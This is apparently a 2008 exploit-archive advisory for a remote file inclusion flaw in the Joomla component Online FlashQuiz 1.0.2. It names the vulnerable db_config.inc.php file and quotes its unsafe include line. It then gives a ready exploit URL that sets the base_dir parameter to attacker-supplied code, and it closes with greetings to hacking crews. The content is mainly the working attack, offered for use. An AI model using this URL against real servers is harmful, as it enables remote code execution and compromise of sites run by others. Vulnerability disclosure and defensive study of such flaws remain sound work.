[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Joomla Component OnlineFlashQuiz <= 1.0.2 RFI Vulnerability
# Published : 2008-04-02
# Author : NoGe
# Previous Title : KwsPHP Module ConcoursPhoto (C_ID) SQL Injection Vulnerability
# Next Title : DaZPHP 0.1 (prefixdir) Local File Inclusion Vulnerability
/==============================================================================================================
| |
| [o] Online FlashQuiz 1.0.2 Remote File Inclusion Vulnerability |
| |
| Software : com_onlineflashquiz version 1.0.2 - paid component |
| Developer : www.elearningforce.biz |
| Author : NoGe |
| Contact : noge[dot]code[at]gmail[dot]com |
| |
|==============================================================================================================|
| |
| [o] Vulnerable file |
| |
| component/com_onlineflashquiz/quiz/common/db_config.inc.php |
| |
| include_once($base_dir."common/classes/DBBase.class.php"); |
| |
| |
| |
| [o] Exploit |
| |
| http://localhost/path/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=[evilcode] |
| |
|==============================================================================================================|
| |
| [o] Greetz |
| |
| all crew #papuahacker #baliemhackerlink #nyubicrew |
| skulmatic olibekas ulga Cungkee nyubi k1tk4t str0ke |
| yooogy H312Y Vrs-hCk Oon_Boy Paman mousekill }^-^{ SiKodoQ |
| http://kapukvalley.net member |
| |
==============================================================================================================/
# www.Syue.com [2008-04-02]